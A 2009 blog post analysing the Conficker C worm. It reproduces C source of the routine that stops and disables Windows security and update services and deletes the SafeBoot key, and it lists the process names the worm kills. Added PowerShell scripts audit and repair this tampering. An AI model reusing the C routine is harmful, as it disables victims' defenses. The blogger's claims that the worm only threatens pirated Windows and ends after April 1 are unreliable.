Wednesday, April 1, 2009

April 1 Conficker Virus 2

Below is the actual logic Conficker C used to disable security services, as recovered by decompilation (the function and variable names were assigned by the analysts, not the worm's author). For each service in a fixed list, C opens the Service Control Manager with all access rights, opens the named service, and queries its status. Unless the service is reported as a kernel driver, it sends a stop control and sleeps for 4 seconds; it then sets the service's start type to disabled so the service is never started again. After that it deletes Windows Defender's autostart value, a shell service object registration, and the whole SafeBoot registry key (which removes the ability to boot into Safe Mode), and finally starts a thread that watches for and kills the cleanup tools listed further down.


#include <windows.h>
#include <shlwapi.h>

/* Thread routine from the same sample; its body is shown elsewhere in the analysis. */
DWORD WINAPI monitor_and_terminate_conficker_cleaners(LPVOID lpParam);
int disable_security_service(LPCSTR lpServiceName);

BOOL disable_security_services_and_terminate_conficker_cleaners(void)
{
    HANDLE hThread;
    DWORD  ThreadId;

    /* Stop and permanently disable the services that would detect, update or
       report on the infection: Security Center, Windows Defender, Windows Update,
       BITS, and Error Reporting (ERSvc on XP, WerSvc on Vista). */
    disable_security_service("wscsvc");
    disable_security_service("WinDefend");
    disable_security_service("wuauserv");
    disable_security_service("BITS");
    disable_security_service("ERSvc");
    disable_security_service("WerSvc");

    /* Remove Windows Defender's autostart value, the shell service object
       registered under this GUID, and the SafeBoot key (no more Safe Mode).
       The decompiler showed the key deletions through a wrapper named
       callSHDeleteKeyW; the ANSI API is used here for the narrow strings. */
    SHDeleteValueA(HKEY_LOCAL_MACHINE,
                   "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                   "Windows Defender");
    SHDeleteKeyA(HKEY_LOCAL_MACHINE,
                 "Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\ShellServiceObjects\\{FD6905CE-952F-41F1-9A6F-135D9C6622CC}");
    SHDeleteKeyA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\SafeBoot");

    /* Background thread that kills the cleanup and analysis tools listed below. */
    hThread = CreateThread(NULL, 0, monitor_and_terminate_conficker_cleaners,
                           NULL, 0, &ThreadId);
    return CloseHandle(hThread);
}

int disable_security_service(LPCSTR lpServiceName)
{
    SC_HANDLE      hSCManager;
    SC_HANDLE      hService;
    SERVICE_STATUS ServiceStatus;
    int            result = 0;

    /* Open the service control manager with every right; this only succeeds
       when the worm already runs with administrative privileges. */
    hSCManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (hSCManager)
    {
        /* 0x20027 = READ_CONTROL | SERVICE_QUERY_CONFIG | SERVICE_CHANGE_CONFIG
                   | SERVICE_QUERY_STATUS | SERVICE_STOP */
        hService = OpenServiceA(hSCManager, lpServiceName, 0x20027u);
        if (hService)
        {
            if (QueryServiceStatus(hService, &ServiceStatus))
            {
                /* Kernel drivers are not sent a stop request. */
                if (ServiceStatus.dwServiceType != SERVICE_KERNEL_DRIVER)
                {
                    /* SERVICE_CONTROL_STOP (1) tells the service to stop;
                       give it 4 seconds to do so. */
                    if (ControlService(hService, SERVICE_CONTROL_STOP, &ServiceStatus))
                        Sleep(4000);
                }
            }
            /* Start type SERVICE_DISABLED (4) so the service is never started again;
               SERVICE_NO_CHANGE (0xFFFFFFFF) leaves service type and error control alone. */
            result |= ChangeServiceConfigA(hService, SERVICE_NO_CHANGE, SERVICE_DISABLED,
                                           SERVICE_NO_CHANGE, NULL, NULL, NULL, NULL,
                                           NULL, NULL, NULL);
            CloseServiceHandle(hService);
        }
        CloseServiceHandle(hSCManager);
    }
    return result;
}
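The other side of that routine is checking a suspect machine for exactly the damage it does. The following PowerShell is an added example of mine, not code from the original post or from the analysis it quotes: it reports the start mode of the six services the worm disables, checks whether the three registry locations it deletes are still present, and can re-enable the services. Service and key names are the ones from the decompiled logic above; the function names are my own. Run it from an elevated prompt.

```powershell
# Added example: audit and repair the service/registry tampering shown above.
# Names come from the decompiled Conficker C routine; function names are mine.

$ConfickerServices = 'wscsvc', 'WinDefend', 'wuauserv', 'BITS', 'ERSvc', 'WerSvc'

function Get-ConfickerServiceState {
    # One object per service with its current start mode and run state.
    foreach ($name in $ConfickerServices) {
        $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$name'"
        if (-not $svc) {
            # ERSvc (XP) and WerSvc (Vista and later) never coexist, so one is expected to be absent.
            [pscustomobject]@{ Name = $name; Present = $false; StartMode = $null; State = $null; Tampered = $false }
            continue
        }
        [pscustomobject]@{
            Name      = $name
            Present   = $true
            StartMode = $svc.StartMode
            State     = $svc.State
            # 'Disabled' is what ChangeServiceConfigA(..., SERVICE_DISABLED, ...) leaves behind.
            Tampered  = ($svc.StartMode -eq 'Disabled')
        }
    }
}

function Get-ConfickerRegistryState {
    # The three registry locations the routine deletes; 'Present = $false' is the tampered state.
    $checks = @(
        @{ Kind = 'Value'; Path = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'; Name = 'Windows Defender' }
        @{ Kind = 'Key';   Path = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\explorer\ShellServiceObjects\{FD6905CE-952F-41F1-9A6F-135D9C6622CC}' }
        @{ Kind = 'Key';   Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot' }
    )
    foreach ($c in $checks) {
        if ($c.Kind -eq 'Key') {
            $present = Test-Path -LiteralPath $c.Path
            $label   = $c.Path
        } else {
            $present = $null -ne (Get-ItemProperty -LiteralPath $c.Path -Name $c.Name -ErrorAction SilentlyContinue)
            $label   = "$($c.Path)\$($c.Name)"
        }
        [pscustomobject]@{ Location = $label; Present = $present }
    }
}

function Repair-ConfickerServices {
    # Re-enable and start every service found Disabled. The deleted registry keys
    # (SafeBoot in particular) are better restored from a known-good export of an
    # identical build, so they are only reported, not recreated.
    foreach ($s in Get-ConfickerServiceState) {
        if (-not $s.Tampered) { continue }
        Set-Service -Name $s.Name -StartupType Automatic
        Start-Service -Name $s.Name -ErrorAction Continue
        Write-Host "Re-enabled and started $($s.Name)"
    }
}

Get-ConfickerServiceState  | Format-Table -AutoSize
Get-ConfickerRegistryState | Format-Table -AutoSize
# Repair-ConfickerServices   # uncomment once the host is confirmed cleaned
```

The worm overwrites the start type, so the original value is not recoverable from the tampered entry; Automatic is a reasonable choice for these services on XP and Vista, but compare with a clean host of the same build before relying on it. A "Windows Defender" Run value is only expected on machines that had Defender installed, so its absence alone is not proof of infection.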


C's process monitoring thread also terminates, as soon as it discovers them running on the victim computer, any process whose name contains one of the strings below. The entries are matched as substrings, which is why fragments such as kb890 and ms08-06 appear in the list. These are the removal tools, patches and analysis utilities that threatened the worm's survival on the infected host; in other words, the worm was protecting itself.
  1. autoruns - Sysinternals Autoruns (autostart entry viewer)
  2. avenger - The Avenger, a malware removal tool
  3. confick - Conficker cleanup utilities (matches any name containing "conficker")
  4. downad - cleanup utilities named after the Downadup alias
  5. filemon - Sysinternals File Monitor
  6. gmer - rootkit detector and remover (gmer.net)
  7. hotfix - Microsoft hotfix installers and removal tools
  8. kb890 - Microsoft patch (KB890830 is the Malicious Software Removal Tool)
  9. kb958 - Microsoft patch (KB958644 is the MS08-067 fix for the hole the worm exploits)
  10. kido - removal tools named after the Kido alias
  11. klwk - Kaspersky malware removal tool
  12. mbsa - Microsoft Baseline Security Analyzer
  13. mrt - Microsoft Malicious Software Removal Tool
  14. mrtstub - Microsoft Malicious Software Removal Tool (stub)
  15. ms08-06 - Microsoft patch (MS08-067)
  16. procexp - Sysinternals Process Explorer
  17. procmon - Sysinternals Process Monitor
  18. regmon - Sysinternals Registry Monitor
  19. scct_ - unknown
  20. sysclean - Trend Micro malware removal tool
  21. tcpview - Sysinternals TCPView (TCP/UDP endpoint viewer)
  22. unlocker - file unlocking utility
  23. wireshark - network packet analyzer
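Because the match is a plain substring test, the practical answer for a responder is to run the tool under a name that is not on the list. The PowerShell below is an added example of mine, not part of the original post: it reports which running processes would be killed by the list above, and copies a tool to a random file name before launching it so the monitoring thread has nothing to match. The match strings are the ones listed above; the function names are mine, and the case-insensitive substring rule is assumed from the shape of the list.

```powershell
# Added example: which processes would Conficker C's monitor kill, and how to
# launch a tool under a name it does not match. Strings are from the list above.

$ConfickerKillList = 'autoruns', 'avenger', 'confick', 'downad', 'filemon', 'gmer',
    'hotfix', 'kb890', 'kb958', 'kido', 'klwk', 'mbsa', 'mrt', 'mrtstub', 'ms08-06',
    'procexp', 'procmon', 'regmon', 'scct_', 'sysclean', 'tcpview', 'unlocker', 'wireshark'

function Test-ConfickerTarget {
    # Returns the first list entry contained in the name, or $null if none matches.
    # Assumes a case-insensitive substring match, as fragments like 'kb890' imply.
    param([Parameter(Mandatory)][string]$ProcessName)
    $lower = $ProcessName.ToLowerInvariant()
    foreach ($needle in $ConfickerKillList) {
        if ($lower.Contains($needle)) { return $needle }
    }
    return $null
}

function Get-ConfickerTargetedProcesses {
    # Every running process whose image name (without .exe) would be terminated.
    Get-Process | ForEach-Object {
        $hit = Test-ConfickerTarget -ProcessName $_.ProcessName
        if ($hit) {
            [pscustomobject]@{ Pid = $_.Id; Name = $_.ProcessName; MatchedOn = $hit }
        }
    }
}

function Start-RenamedTool {
    # Copy a tool such as procexp.exe to a random name in %TEMP% and run that copy.
    # Returns the path of the copy so it can be removed afterwards.
    param([Parameter(Mandatory)][string]$Path)
    $newName = ([System.IO.Path]::GetRandomFileName() -replace '\.', '') + '.exe'
    # A random name can still contain a listed fragment (e.g. 'mrt'); refuse rather than get killed.
    if (Test-ConfickerTarget -ProcessName ([System.IO.Path]::GetFileNameWithoutExtension($newName))) {
        throw "Random name '$newName' collides with the kill list; run again."
    }
    $dest = Join-Path $env:TEMP $newName
    Copy-Item -LiteralPath $Path -Destination $dest
    Start-Process -FilePath $dest
    return $dest
}

Get-ConfickerTargetedProcesses | Format-Table -AutoSize
# Start-RenamedTool -Path 'C:\Tools\procexp.exe'   # path is a placeholder for your own copy
```

Note the side effect of substring matching: "hotfix" and "mrt" also hit legitimate Windows patch installers and the monthly Malicious Software Removal Tool run, which is part of why an infected host could not be patched in place.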
My personal perception was: "this virus was designed specially for those illegally obtained or hacked Windows versions. It is a good worm for flushing out unregistered Windows versions. I wonder why Microsoft wants the author of this, when in fact this will help them to get rid of all unregistered versions. If you have an authentic Windows version you don't have to worry; a patch from Microsoft will keep you safe from this virus." So much for this one. It will be April 2 tomorrow, so we don't have to worry about it anymore. Let's see tomorrow what's new on this much talked about virus. ..God bless